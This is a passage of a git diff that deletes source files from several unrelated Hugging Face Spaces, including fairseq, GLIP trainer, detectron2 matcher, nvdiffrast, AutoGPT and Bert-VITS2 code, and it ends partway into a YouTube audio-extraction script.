x = self.project_to_steps(x) # BxCxTxS - x = self.dropout(x) - - negatives = self.sample_negatives(y) - y = y.unsqueeze(0) - targets = torch.cat([y, negatives], dim=0) # Copies x B x C x T - - copies = targets.size(0) - bsz, dim, tsz, steps = x.shape - steps = min(steps, tsz - self.offset) - - predictions = x.new( - bsz * copies * (tsz - self.offset + 1) * steps - - ((steps + 1) * steps // 2) * copies * bsz - ) - if self.infonce: - labels = predictions.new_full( - (predictions.shape[0] // copies,), 0, dtype=torch.long - ) - else: - labels = torch.zeros_like(predictions) - weights = ( - torch.full_like(labels, 1 / self.n_negatives) - if self.balanced_classes and not self.infonce - else None - ) - - start = end = 0 - for i in range(steps): - offset = i + self.offset - end = start + (tsz - offset) * bsz * copies - if self.infonce: - predictions[start:end] = torch.einsum( - "bct,nbct->tbn", x[..., :-offset, i], targets[..., offset:] - ).flatten() - else: - pos_num = (end - start) // copies - predictions[start:end] = torch.einsum( - "bct,nbct->nbt", x[..., :-offset, i], targets[..., offset:] - ).flatten() - labels[start : start + pos_num] = 1.0 - if weights is not None: - weights[start : start + pos_num] = 1.0 - start = end - assert end == predictions.numel(), "{} != {}".format(end, predictions.numel()) - - if self.infonce: - predictions = predictions.view(-1, copies) - else: - if weights is not None: - labels = (labels, weights) - - return predictions, labels diff --git a/spaces/gradio/HuBERT/fairseq/modules/quantization/scalar/utils.py b/spaces/gradio/HuBERT/fairseq/modules/quantization/scalar/utils.py deleted file mode 100644 index 32cf616568160004bd97a673f2d85923974c1fae..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/fairseq/modules/quantization/scalar/utils.py +++ /dev/null @@ -1,77 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import logging -from operator import attrgetter - -import torch.distributed as dist -import torch.nn as nn - -from ..pq.utils import attrsetter, get_layers -from .modules import ActivationQuantizer, IntConv2d, IntEmbedding, IntLinear - - -MAPPING = {nn.Linear: IntLinear, nn.Embedding: IntEmbedding, nn.Conv2d: IntConv2d} - - -def quantize_model_(model, p=0.2, bits=8, update_step=3000): - """ - Replaces all modules with their scalar quantized counterpart and - registers hooks to quantize the post-ativations of those modules. - - Args: - - model: a nn.Module - - p: amount of noise (0 for no noise, 1 to quantize all the weights/activations) - - bits: number of bits - - update_step: update quantization parameters every update_step steps - """ - - # quantize all layers - quantized_layers = get_layers(model, "(.*?)") - - for layer in quantized_layers: - - # book-keeping - is_master_process = (not dist.is_initialized()) or ( - dist.is_initialized() and dist.get_rank() == 0 - ) - - # recover module - module = attrgetter(layer)(model) - if is_master_process: - logging.info( - f"Quantizing layer {layer} with bits={bits} and QuantNoise={p}" - ) - - # quantization params - q_params = { - "p": p, - "update_step": update_step, - "bits": bits, - "method": "histogram", - "counter": 0, - } - - # instantiate the quantized counterpart - if isinstance(module, tuple(MAPPING.keys())): - QuantizedModule = MAPPING[module.__class__] - quantized_module = QuantizedModule.__new__(QuantizedModule) - params = module.__dict__ - params.update(q_params) - quantized_module.__dict__.update(params) - - else: - if is_master_process: - logging.info(f"Module {module} not yet supported for quantization") - continue - - # activation quantization - a_q = ActivationQuantizer(quantized_module, p=0, bits=bits, method="histogram") - - # replace layer by its quantized counterpart - attrsetter(layer)(model, quantized_module) - - # return name of quantized layers - return quantized_layers diff --git a/spaces/gwang-kim/DATID-3D/pose_estimation/nvdiffrast/nvdiffrast/common/rasterize.h b/spaces/gwang-kim/DATID-3D/pose_estimation/nvdiffrast/nvdiffrast/common/rasterize.h deleted file mode 100644 index 6905b98508ea540729a1eae1bfb71af0f4033520..0000000000000000000000000000000000000000 --- a/spaces/gwang-kim/DATID-3D/pose_estimation/nvdiffrast/nvdiffrast/common/rasterize.h +++ /dev/null @@ -1,97 +0,0 @@ -// Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved. -// -// NVIDIA CORPORATION and its licensors retain all intellectual property -// and proprietary rights in and to this software, related documentation -// and any modifications thereto. Any use, reproduction, disclosure or -// distribution of this software and related documentation without an express -// license agreement from NVIDIA CORPORATION is strictly prohibited. - -#pragma once - -//------------------------------------------------------------------------ -// Constants and helpers. - -#define RAST_GRAD_MAX_KERNEL_BLOCK_WIDTH 8 -#define RAST_GRAD_MAX_KERNEL_BLOCK_HEIGHT 8 - -//------------------------------------------------------------------------ -// Gradient CUDA kernel params. - -struct RasterizeGradParams -{ - const float* pos; // Incoming position buffer. - const int* tri; // Incoming triangle buffer. - const float* out; // Rasterizer output buffer. - const float* dy; // Incoming gradients of rasterizer output buffer. - const float* ddb; // Incoming gradients of bary diff output buffer. - float* grad; // Outgoing position gradients. - int numTriangles; // Number of triangles. - int numVertices; // Number of vertices. - int width; // Image width. - int height; // Image height. - int depth; // Size of minibatch. - int instance_mode; // 1 if in instance rendering mode. - float xs, xo, ys, yo; // Pixel position to clip-space x, y transform. -}; - -//------------------------------------------------------------------------ -// Do not try to include OpenGL stuff when compiling CUDA kernels for torch. - -#if !(defined(NVDR_TORCH) && defined(__CUDACC__)) -#include "framework.h" -#include "glutil.h" - -//------------------------------------------------------------------------ -// Draw command struct used by rasterizer. - -struct GLDrawCmd -{ - uint32_t count; - uint32_t instanceCount; - uint32_t firstIndex; - uint32_t baseVertex; - uint32_t baseInstance; -}; - -//------------------------------------------------------------------------ -// OpenGL-related persistent state for forward op. - -struct RasterizeGLState -{ - int width; // Allocated frame buffer width. - int height; // Allocated frame buffer height. - int depth; // Allocated frame buffer depth. - int posCount; // Allocated position buffer in floats. - int triCount; // Allocated triangle buffer in ints. - GLContext glctx; - GLuint glFBO; - GLuint glColorBuffer[2]; - GLuint glPrevOutBuffer; - GLuint glDepthStencilBuffer; - GLuint glVAO; - GLuint glTriBuffer; - GLuint glPosBuffer; - GLuint glProgram; - GLuint glProgramDP; - GLuint glVertexShader; - GLuint glGeometryShader; - GLuint glFragmentShader; - GLuint glFragmentShaderDP; - cudaGraphicsResource_t cudaColorBuffer[2]; - cudaGraphicsResource_t cudaPrevOutBuffer; - cudaGraphicsResource_t cudaPosBuffer; - cudaGraphicsResource_t cudaTriBuffer; - std::vector drawCmdBuffer; - int enableDB; -}; - -//------------------------------------------------------------------------ -// Shared C++ code prototypes. - -void rasterizeInitGLContext(NVDR_CTX_ARGS, RasterizeGLState& s, int cudaDeviceIdx); -void rasterizeResizeBuffers(NVDR_CTX_ARGS, RasterizeGLState& s, int posCount, int triCount, int width, int height, int depth); -void rasterizeRender(NVDR_CTX_ARGS, RasterizeGLState& s, cudaStream_t stream, const float* posPtr, int posCount, int vtxPerInstance, const int32_t* triPtr, int triCount, const int32_t* rangesPtr, int width, int height, int depth, int peeling_idx); -void rasterizeCopyResults(NVDR_CTX_ARGS, RasterizeGLState& s, cudaStream_t stream, float** outputPtr, int width, int height, int depth); - -//------------------------------------------------------------------------ -#endif // !(defined(NVDR_TORCH) && defined(__CUDACC__)) diff --git a/spaces/haakohu/deep_privacy2_face/dp2/utils/cse.py b/spaces/haakohu/deep_privacy2_face/dp2/utils/cse.py deleted file mode 100644 index cd3e01d28ba10e6d4d14ecd49c3a70dcaaa194ce..0000000000000000000000000000000000000000 --- a/spaces/haakohu/deep_privacy2_face/dp2/utils/cse.py +++ /dev/null @@ -1,21 +0,0 @@ -import warnings -import torch -from densepose.modeling.cse.utils import get_closest_vertices_mask_from_ES - - -def from_E_to_vertex(E, M, embed_map): - """ - M is 1 for unkown regions - """ - assert len(E.shape) == 4 - assert len(E.shape) == len(M.shape), (E.shape, M.shape) - assert E.shape[0] == 1 - M = M.float() - M = torch.cat([M, 1-M], dim=1) - with warnings.catch_warnings(): # Ignore userError for pytorch interpolate from detectron2 - warnings.filterwarnings("ignore") - vertices, _ = get_closest_vertices_mask_from_ES( - E, M, E.shape[2], E.shape[3], - embed_map, device=E.device) - - return vertices.long() diff --git a/spaces/hamelcubsfan/AutoGPT/autogpt/commands/write_tests.py b/spaces/hamelcubsfan/AutoGPT/autogpt/commands/write_tests.py deleted file mode 100644 index 35a086536c9d05d520a84b15ead49f775eacdcc9..0000000000000000000000000000000000000000 --- a/spaces/hamelcubsfan/AutoGPT/autogpt/commands/write_tests.py +++ /dev/null @@ -1,31 +0,0 @@ -"""A module that contains a function to generate test cases for the submitted code.""" -from __future__ import annotations - -import json - -from autogpt.llm_utils import call_ai_function - - -def write_tests(code: str, focus: list[str]) -> str: - """ - A function that takes in code and focus topics and returns a response from create - chat completion api call. - - Parameters: - focus (list): A list of suggestions around what needs to be improved. - code (str): Code for test cases to be generated against. - Returns: - A result string from create chat completion. Test cases for the submitted code - in response. - """ - - function_string = ( - "def create_test_cases(code: str, focus: Optional[str] = None) -> str:" - ) - args = [code, json.dumps(focus)] - description_string = ( - "Generates test cases for the existing code, focusing on" - " specific areas if required." - ) - - return call_ai_function(function_string, args, description_string) diff --git a/spaces/hamelcubsfan/AutoGPT/autogpt/processing/__init__.py b/spaces/hamelcubsfan/AutoGPT/autogpt/processing/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/haotiz/glip-zeroshot-demo/maskrcnn_benchmark/engine/trainer.py b/spaces/haotiz/glip-zeroshot-demo/maskrcnn_benchmark/engine/trainer.py deleted file mode 100644 index 8831755892481b6603e5ea5c3b64aff3930b6486..0000000000000000000000000000000000000000 --- a/spaces/haotiz/glip-zeroshot-demo/maskrcnn_benchmark/engine/trainer.py +++ /dev/null @@ -1,360 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. -import datetime -import logging -import sys -import os -import math -import time - -import torch -import torch.distributed as dist - -from maskrcnn_benchmark.utils.comm import get_world_size, all_gather, is_main_process, broadcast_data, get_rank -from maskrcnn_benchmark.utils.metric_logger import MetricLogger -from maskrcnn_benchmark.utils.ema import ModelEma -from maskrcnn_benchmark.utils.amp import autocast, GradScaler -from maskrcnn_benchmark.data.datasets.evaluation import evaluate -from .inference import inference -import pdb - -def reduce_loss_dict(loss_dict): - """ - Reduce the loss dictionary from all processes so that process with rank - 0 has the averaged results. Returns a dict with the same fields as - loss_dict, after reduction. - """ - world_size = get_world_size() - if world_size < 2: - return loss_dict - with torch.no_grad(): - loss_names = [] - all_losses = [] - for k in sorted(loss_dict.keys()): - loss_names.append(k) - all_losses.append(loss_dict[k]) - all_losses = torch.stack(all_losses, dim=0) - dist.reduce(all_losses, dst=0) - if dist.get_rank() == 0: - # only main process gets accumulated, so only divide by - # world_size in this case - all_losses /= world_size - reduced_losses = {k: v for k, v in zip(loss_names, all_losses)} - return reduced_losses - - -def do_train( - cfg, - model, - data_loader, - optimizer, - scheduler, - checkpointer, - device, - checkpoint_period, - arguments, - val_data_loader=None, - meters=None, - zero_shot=False -): - logger = logging.getLogger("maskrcnn_benchmark.trainer") - logger.info("Start training") - # meters = MetricLogger(delimiter=" ") - max_iter = len(data_loader) - start_iter = arguments["iteration"] - model.train() - model_ema = None - if cfg.SOLVER.MODEL_EMA > 0: - model_ema = ModelEma(model, decay=cfg.SOLVER.MODEL_EMA) - start_training_time = time.time() - end = time.time() - - if cfg.SOLVER.USE_AMP: - scaler = GradScaler() - - global_rank = get_rank() - - if cfg.SOLVER.CHECKPOINT_PER_EPOCH != -1 and cfg.SOLVER.MAX_EPOCH >= 1: - checkpoint_period = len(data_loader) * cfg.SOLVER.CHECKPOINT_PER_EPOCH // cfg.SOLVER.MAX_EPOCH - - if global_rank <= 0 and cfg.SOLVER.MAX_EPOCH >= 1: - print("Iter per epoch ", len(data_loader) // cfg.SOLVER.MAX_EPOCH ) - - if cfg.SOLVER.AUTO_TERMINATE_PATIENCE != -1: - patience_counter = 0 - previous_best = 0.0 - - # Adapt the weight decay - if cfg.SOLVER.WEIGHT_DECAY_SCHEDULE and hasattr(scheduler, 'milestones'): - milestone_target = 0 - for i, milstone in enumerate(list(scheduler.milestones)): - if scheduler.last_epoch >= milstone * cfg.SOLVER.WEIGHT_DECAY_SCHEDULE_RATIO: - milestone_target = i+1 - for iteration, (images, targets, idxs, positive_map, positive_map_eval, greenlight_map) in enumerate(data_loader, start_iter): - nnegative = sum(len(target) < 1 for target in targets) - nsample = len(targets) - if nsample == nnegative or nnegative > nsample * cfg.SOLVER.MAX_NEG_PER_BATCH: - logger.info('[WARNING] Sampled {} negative in {} in a batch, greater the allowed ratio {}, skip'. - format(nnegative, nsample, cfg.SOLVER.MAX_NEG_PER_BATCH)) - continue - - data_time = time.time() - end - iteration = iteration + 1 - arguments["iteration"] = iteration - - images = images.to(device) - captions = None - try: - targets = [target.to(device) for target in targets] - captions = [t.get_field("caption") for t in targets if "caption" in t.fields()] - except: - pass - # Freeze language backbone - if cfg.MODEL.LANGUAGE_BACKBONE.FREEZE: - if hasattr(model, "module"): - model.module.language_backbone.eval() - else: - model.language_backbone.eval() - - if cfg.SOLVER.USE_AMP: - with autocast(): - if len(captions) > 0: - loss_dict = model(images, targets, captions, positive_map, greenlight_map = greenlight_map) - else: - loss_dict = model(images, targets) - losses = sum(loss for loss in loss_dict.values()) - - # save checkpoints for further debug if nan happens - # loss_value = losses.item() - # if not math.isfinite(loss_value): - # logging.error(f'=> loss is {loss_value}, stopping training') - # logging.error("Losses are : {}".format(loss_dict)) - # time_str = time.strftime('%Y-%m-%d-%H-%M') - # fname = os.path.join(checkpointer.save_dir, f'{time_str}_states.pth') - # logging.info(f'=> save error state to {fname}') - # dict_to_save = { - # 'x': images, - # 'y': targets, - # 'loss': losses, - # 'states': model.module.state_dict() if hasattr(model, 'module') else model.state_dict() - # } - # if len(captions) > 0: - # dict_to_save['captions'] = captions - # dict_to_save['positive_map'] = positive_map - # torch.save( - # dict_to_save, - # fname - # ) - - - if torch.isnan(losses) or torch.isinf(losses): - logging.error("NaN encountered, ignoring") - losses[losses != losses] = 0 - optimizer.zero_grad() - scaler.scale(losses).backward() - scaler.step(optimizer) - scaler.update() - scheduler.step() - else: - if len(captions) > 0: - loss_dict = model(images, targets, captions, positive_map) - else: - loss_dict = model(images, targets) - losses = sum(loss for loss in loss_dict.values()) - - # loss_value = losses.item() - # if not math.isfinite(loss_value): - # logging.error(f'=> loss is {loss_value}, stopping training') - # time_str = time.strftime('%Y-%m-%d-%H-%M') - # fname = os.path.join(checkpointer.save_dir, f'{time_str}_states.pth') - # logging.info(f'=> save error state to {fname}') - # dict_to_save = { - # 'x': images, - # 'y': targets, - # 'loss': losses, - # 'states': model.module.state_dict() if hasattr(model, 'module') else model.state_dict() - # } - # if len(captions) > 0: - # dict_to_save['captions'] = captions - # dict_to_save['positive_map'] = positive_map - # torch.save( - # dict_to_save, - # fname - # ) - - - if torch.isnan(losses) or torch.isinf(losses): - losses[losses != losses] = 0 - optimizer.zero_grad() - losses.backward() - optimizer.step() - scheduler.step() - - # Adapt the weight decay: only support multiStepLR - if cfg.SOLVER.WEIGHT_DECAY_SCHEDULE and hasattr(scheduler, 'milestones'): - if milestone_target < len(scheduler.milestones): - next_milestone = list(scheduler.milestones)[milestone_target] - else: - next_milestone = float('inf') - if scheduler.last_epoch >= next_milestone * cfg.SOLVER.WEIGHT_DECAY_SCHEDULE_RATIO: - gamma = scheduler.gamma - logger.info("Drop the weight decay by {}!".format(gamma)) - for param in optimizer.param_groups: - if 'weight_decay' in param: - param['weight_decay'] *= gamma - # move the target forward - milestone_target += 1 - - # reduce losses over all GPUs for logging purposes - loss_dict_reduced = reduce_loss_dict(loss_dict) - losses_reduced = sum(loss for loss in loss_dict_reduced.values()) - meters.update(loss=losses_reduced, **loss_dict_reduced) - if model_ema is not None: - model_ema.update(model) - arguments["model_ema"] = model_ema.state_dict() - - batch_time = time.time() - end - end = time.time() - meters.update(time=batch_time, data=data_time) - eta_seconds = meters.time.global_avg * (max_iter - iteration) - eta_string = str(datetime.timedelta(seconds=int(eta_seconds))) - - if iteration % 20 == 0 or iteration == max_iter: - # if iteration % 1 == 0 or iteration == max_iter: - #logger.info( - if global_rank <= 0: - print( - meters.delimiter.join( - [ - "eta: {eta}", - "iter: {iter}", - "{meters}", - "lr: {lr:.6f}", - "wd: {wd:.6f}", - "max mem: {memory:.0f}", - ] - ).format( - eta=eta_string, - iter=iteration, - meters=str(meters), - lr=optimizer.param_groups[0]["lr"], - wd=optimizer.param_groups[0]["weight_decay"], - memory=torch.cuda.max_memory_allocated() / 1024.0 / 1024.0, - ) - ) - if val_data_loader and (iteration % checkpoint_period == 0 or iteration == max_iter): - if is_main_process(): - print("Evaluating") - eval_result = 0.0 - model.eval() - if cfg.SOLVER.TEST_WITH_INFERENCE: - with torch.no_grad(): - try: - _model = model.module - except: - _model = model - _result = inference( - model = _model, - data_loader = val_data_loader, - dataset_name="val", - device=device, - expected_results=cfg.TEST.EXPECTED_RESULTS, - expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL, - output_folder=None, - cfg=cfg, - verbose=False - ) - if is_main_process(): - eval_result = _result[0].results['bbox']['AP'] - else: - results_dict = {} - cpu_device = torch.device("cpu") - for i, batch in enumerate(val_data_loader): - images, targets, image_ids, positive_map, *_ = batch - with torch.no_grad(): - images = images.to(device) - if positive_map is None: - output = model(images) - else: - captions = [t.get_field("caption") for t in targets if "caption" in t.fields()] - output = model(images, captions, positive_map) - output = [o.to(cpu_device) for o in output] - results_dict.update( - {img_id: result for img_id, result in zip(image_ids, output)} - ) - all_predictions = all_gather(results_dict) - if is_main_process(): - predictions = {} - for p in all_predictions: - predictions.update(p) - predictions = [predictions[i] for i in list(sorted(predictions.keys()))] - eval_result, _ = evaluate(val_data_loader.dataset, predictions, output_folder=None, - box_only=cfg.DATASETS.CLASS_AGNOSTIC) - if cfg.DATASETS.CLASS_AGNOSTIC: - eval_result = eval_result.results['box_proposal']['AR@100'] - else: - eval_result = eval_result.results['bbox']['AP'] - model.train() - - if model_ema is not None and cfg.SOLVER.USE_EMA_FOR_MONITOR: - model_ema.ema.eval() - results_dict = {} - cpu_device = torch.device("cpu") - for i, batch in enumerate(val_data_loader): - images, targets, image_ids, positive_map, positive_map_eval = batch - with torch.no_grad(): - images = images.to(device) - if positive_map is None: - output = model_ema.ema(images) - else: - captions = [t.get_field("caption") for t in targets if "caption" in t.fields()] - output = model_ema.ema(images, captions, positive_map) - output = [o.to(cpu_device) for o in output] - results_dict.update( - {img_id: result for img_id, result in zip(image_ids, output)} - ) - all_predictions = all_gather(results_dict) - if is_main_process(): - predictions = {} - for p in all_predictions: - predictions.update(p) - predictions = [predictions[i] for i in list(sorted(predictions.keys()))] - eval_result, _ = evaluate(val_data_loader.dataset, predictions, output_folder=None, - box_only=cfg.DATASETS.CLASS_AGNOSTIC) - if cfg.DATASETS.CLASS_AGNOSTIC: - eval_result = eval_result.results['box_proposal']['AR@100'] - else: - eval_result = eval_result.results['bbox']['AP'] - - arguments.update(eval_result=eval_result) - - if cfg.SOLVER.USE_AUTOSTEP: - eval_result = all_gather(eval_result)[0] #broadcast_data([eval_result])[0] - # print("Rank {} eval result gathered".format(cfg.local_rank), eval_result) - scheduler.step(eval_result) - - if cfg.SOLVER.AUTO_TERMINATE_PATIENCE != -1: - if eval_result < previous_best: - patience_counter += 1 - else: - patience_counter = 0 - previous_best = eval_result - checkpointer.save("model_best", **arguments) - print("Previous Best", previous_best, "Patience Counter", patience_counter, "Eval Result", eval_result) - if patience_counter >= cfg.SOLVER.AUTO_TERMINATE_PATIENCE: - if is_main_process(): - print("\n\n\n\nAuto Termination at {}, current best {}\n\n\n".format(iteration, previous_best)) - break - - if iteration % checkpoint_period == 0: - checkpointer.save("model_{:07d}".format(iteration), **arguments) - if iteration == max_iter: - checkpointer.save("model_final", **arguments) - break - - total_training_time = time.time() - start_training_time - total_time_str = str(datetime.timedelta(seconds=total_training_time)) - logger.info( - "Total training time: {} ({:.4f} s / it)".format( - total_time_str, total_training_time / (max_iter) - ) - ) diff --git a/spaces/hasibzunair/fifa-tryon-demo/Self-Correction-Human-Parsing-for-ACGPN/mhp_extension/detectron2/detectron2/modeling/matcher.py b/spaces/hasibzunair/fifa-tryon-demo/Self-Correction-Human-Parsing-for-ACGPN/mhp_extension/detectron2/detectron2/modeling/matcher.py deleted file mode 100644 index 2911f8c1937749dec4dbe64aa3e8491a631e03f2..0000000000000000000000000000000000000000 --- a/spaces/hasibzunair/fifa-tryon-demo/Self-Correction-Human-Parsing-for-ACGPN/mhp_extension/detectron2/detectron2/modeling/matcher.py +++ /dev/null @@ -1,123 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved -from typing import List -import torch - - -class Matcher(object): - """ - This class assigns to each predicted "element" (e.g., a box) a ground-truth - element. Each predicted element will have exactly zero or one matches; each - ground-truth element may be matched to zero or more predicted elements. - - The matching is determined by the MxN match_quality_matrix, that characterizes - how well each (ground-truth, prediction)-pair match each other. For example, - if the elements are boxes, this matrix may contain box intersection-over-union - overlap values. - - The matcher returns (a) a vector of length N containing the index of the - ground-truth element m in [0, M) that matches to prediction n in [0, N). - (b) a vector of length N containing the labels for each prediction. - """ - - def __init__( - self, thresholds: List[float], labels: List[int], allow_low_quality_matches: bool = False - ): - """ - Args: - thresholds (list): a list of thresholds used to stratify predictions - into levels. - labels (list): a list of values to label predictions belonging at - each level. A label can be one of {-1, 0, 1} signifying - {ignore, negative class, positive class}, respectively. - allow_low_quality_matches (bool): if True, produce additional matches - for predictions with maximum match quality lower than high_threshold. - See set_low_quality_matches_ for more details. - - For example, - thresholds = [0.3, 0.5] - labels = [0, -1, 1] - All predictions with iou < 0.3 will be marked with 0 and - thus will be considered as false positives while training. - All predictions with 0.3 <= iou < 0.5 will be marked with -1 and - thus will be ignored. - All predictions with 0.5 <= iou will be marked with 1 and - thus will be considered as true positives. - """ - # Add -inf and +inf to first and last position in thresholds - thresholds = thresholds[:] - assert thresholds[0] > 0 - thresholds.insert(0, -float("inf")) - thresholds.append(float("inf")) - assert all(low <= high for (low, high) in zip(thresholds[:-1], thresholds[1:])) - assert all(l in [-1, 0, 1] for l in labels) - assert len(labels) == len(thresholds) - 1 - self.thresholds = thresholds - self.labels = labels - self.allow_low_quality_matches = allow_low_quality_matches - - def __call__(self, match_quality_matrix): - """ - Args: - match_quality_matrix (Tensor[float]): an MxN tensor, containing the - pairwise quality between M ground-truth elements and N predicted - elements. All elements must be >= 0 (due to the us of `torch.nonzero` - for selecting indices in :meth:`set_low_quality_matches_`). - - Returns: - matches (Tensor[int64]): a vector of length N, where matches[i] is a matched - ground-truth index in [0, M) - match_labels (Tensor[int8]): a vector of length N, where pred_labels[i] indicates - whether a prediction is a true or false positive or ignored - """ - assert match_quality_matrix.dim() == 2 - if match_quality_matrix.numel() == 0: - default_matches = match_quality_matrix.new_full( - (match_quality_matrix.size(1),), 0, dtype=torch.int64 - ) - # When no gt boxes exist, we define IOU = 0 and therefore set labels - # to `self.labels[0]`, which usually defaults to background class 0 - # To choose to ignore instead, can make labels=[-1,0,-1,1] + set appropriate thresholds - default_match_labels = match_quality_matrix.new_full( - (match_quality_matrix.size(1),), self.labels[0], dtype=torch.int8 - ) - return default_matches, default_match_labels - - assert torch.all(match_quality_matrix >= 0) - - # match_quality_matrix is M (gt) x N (predicted) - # Max over gt elements (dim 0) to find best gt candidate for each prediction - matched_vals, matches = match_quality_matrix.max(dim=0) - - match_labels = matches.new_full(matches.size(), 1, dtype=torch.int8) - - for (l, low, high) in zip(self.labels, self.thresholds[:-1], self.thresholds[1:]): - low_high = (matched_vals >= low) & (matched_vals < high) - match_labels[low_high] = l - - if self.allow_low_quality_matches: - self.set_low_quality_matches_(match_labels, match_quality_matrix) - - return matches, match_labels - - def set_low_quality_matches_(self, match_labels, match_quality_matrix): - """ - Produce additional matches for predictions that have only low-quality matches. - Specifically, for each ground-truth G find the set of predictions that have - maximum overlap with it (including ties); for each prediction in that set, if - it is unmatched, then match it to the ground-truth G. - - This function implements the RPN assignment case (i) in Sec. 3.1.2 of - :paper:`Faster R-CNN`. - """ - # For each gt, find the prediction with which it has highest quality - highest_quality_foreach_gt, _ = match_quality_matrix.max(dim=1) - # Find the highest quality match available, even if it is low, including ties. - # Note that the matches qualities must be positive due to the use of - # `torch.nonzero`. - _, pred_inds_with_highest_quality = torch.nonzero( - match_quality_matrix == highest_quality_foreach_gt[:, None], as_tuple=True - ) - # If an anchor was labeled positive only due to a low-quality match - # with gt_A, but it has larger overlap with gt_B, it's matched index will still be gt_B. - # This follows the implementation in Detectron, and is found to have no significant impact. - match_labels[pred_inds_with_highest_quality] = 1 diff --git a/spaces/hasibzunair/fifa-tryon-demo/Self-Correction-Human-Parsing-for-ACGPN/mhp_extension/detectron2/projects/DensePose/densepose/utils/transform.py b/spaces/hasibzunair/fifa-tryon-demo/Self-Correction-Human-Parsing-for-ACGPN/mhp_extension/detectron2/projects/DensePose/densepose/utils/transform.py deleted file mode 100644 index b7cfe097234dbd3ff19b84ecdfb63fd8bf5fd4b6..0000000000000000000000000000000000000000 --- a/spaces/hasibzunair/fifa-tryon-demo/Self-Correction-Human-Parsing-for-ACGPN/mhp_extension/detectron2/projects/DensePose/densepose/utils/transform.py +++ /dev/null @@ -1,16 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved -from fvcore.common.file_io import PathManager - -from detectron2.data import MetadataCatalog - -from densepose import DensePoseTransformData - - -def load_for_dataset(dataset_name): - path = MetadataCatalog.get(dataset_name).densepose_transform_src - densepose_transform_data_fpath = PathManager.get_local_path(path) - return DensePoseTransformData.load(densepose_transform_data_fpath) - - -def load_from_cfg(cfg): - return load_for_dataset(cfg.DATASETS.TEST[0]) diff --git a/spaces/hezhaoqia/vits-simple-api/bert_vits2/bert_vits2.py b/spaces/hezhaoqia/vits-simple-api/bert_vits2/bert_vits2.py deleted file mode 100644 index 6b56d52387e25553d2545c8e4b5c4be5602876ab..0000000000000000000000000000000000000000 --- a/spaces/hezhaoqia/vits-simple-api/bert_vits2/bert_vits2.py +++ /dev/null @@ -1,86 +0,0 @@ -import numpy as np -import torch - -from bert_vits2 import utils, commons -from bert_vits2.models import SynthesizerTrn -from bert_vits2.text import symbols, cleaned_text_to_sequence, get_bert -from bert_vits2.text.cleaner import clean_text -from utils.nlp import sentence_split, cut - - -class Bert_VITS2: - def __init__(self, model, config, device=torch.device("cpu")): - self.hps_ms = utils.get_hparams_from_file(config) - self.n_speakers = getattr(self.hps_ms.data, 'n_speakers', 0) - self.speakers = [item[0] for item in - sorted(list(getattr(self.hps_ms.data, 'spk2id', {'0': 0}).items()), key=lambda x: x[1])] - self.net_g = SynthesizerTrn( - len(symbols), - self.hps_ms.data.filter_length // 2 + 1, - self.hps_ms.train.segment_size // self.hps_ms.data.hop_length, - n_speakers=self.hps_ms.data.n_speakers, - **self.hps_ms.model).to(device) - _ = self.net_g.eval() - self.device = device - self.load_model(model) - - def load_model(self, model): - utils.load_checkpoint(model, self.net_g, None, skip_optimizer=True) - - def get_speakers(self): - return self.speakers - - def get_text(self, text, language_str, hps): - norm_text, phone, tone, word2ph = clean_text(text, language_str) - # print([f"{p}{t}" for p, t in zip(phone, tone)]) - phone, tone, language = cleaned_text_to_sequence(phone, tone, language_str) - - if hps.data.add_blank: - phone = commons.intersperse(phone, 0) - tone = commons.intersperse(tone, 0) - language = commons.intersperse(language, 0) - for i in range(len(word2ph)): - word2ph[i] = word2ph[i] * 2 - word2ph[0] += 1 - bert = get_bert(norm_text, word2ph, language_str) - - assert bert.shape[-1] == len(phone) - - phone = torch.LongTensor(phone) - tone = torch.LongTensor(tone) - language = torch.LongTensor(language) - - return bert, phone, tone, language - - def infer(self, text, sdp_ratio, noise_scale, noise_scale_w, length_scale, sid): - bert, phones, tones, lang_ids = self.get_text(text, "ZH", self.hps_ms) - with torch.no_grad(): - x_tst = phones.to(self.device).unsqueeze(0) - tones = tones.to(self.device).unsqueeze(0) - lang_ids = lang_ids.to(self.device).unsqueeze(0) - bert = bert.to(self.device).unsqueeze(0) - x_tst_lengths = torch.LongTensor([phones.size(0)]).to(self.device) - speakers = torch.LongTensor([int(sid)]).to(self.device) - audio = self.net_g.infer(x_tst, x_tst_lengths, speakers, tones, lang_ids, bert, sdp_ratio=sdp_ratio - , noise_scale=noise_scale, noise_scale_w=noise_scale_w, length_scale=length_scale)[ - 0][0, 0].data.cpu().float().numpy() - - torch.cuda.empty_cache() - return audio - - def get_audio(self, voice, auto_break=False): - text = voice.get("text", None) - sdp_ratio = voice.get("sdp_ratio", 0.2) - noise_scale = voice.get("noise", 0.5) - noise_scale_w = voice.get("noisew", 0.6) - length_scale = voice.get("length", 1) - sid = voice.get("id", 0) - max = voice.get("max", 50) - # sentence_list = sentence_split(text, max, "ZH", ["zh"]) - sentence_list = cut(text, max) - audios = [] - for sentence in sentence_list: - audio = self.infer(sentence, sdp_ratio, noise_scale, noise_scale_w, length_scale, sid) - audios.append(audio) - audio = np.concatenate(audios) - return audio diff --git a/spaces/hkunlp/Binder/utils/tab_fact/__init__.py b/spaces/hkunlp/Binder/utils/tab_fact/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/hu-po/speech2speech/src/tube.py b/spaces/hu-po/speech2speech/src/tube.py deleted file mode 100644 index f849f30ca45e97722130e4fd32f4cce604d7d74f..0000000000000000000000000000000000000000 --- a/spaces/hu-po/speech2speech/src/tube.py +++ /dev/null @@ -1,64 +0,0 @@ -''' -Extract audio from a YouTube video - -Usage: - tube.py [-s ] [-d ] -''' - -import subprocess -from pathlib import Path -import datetime -import argparse -import os -from pytube import YouTube - -# Define argparse arguments -parser = argparse.ArgumentParser(description='Extract audio from a YouTube video') -parser.add_argument('url', type=str, help='the YouTube video URL') 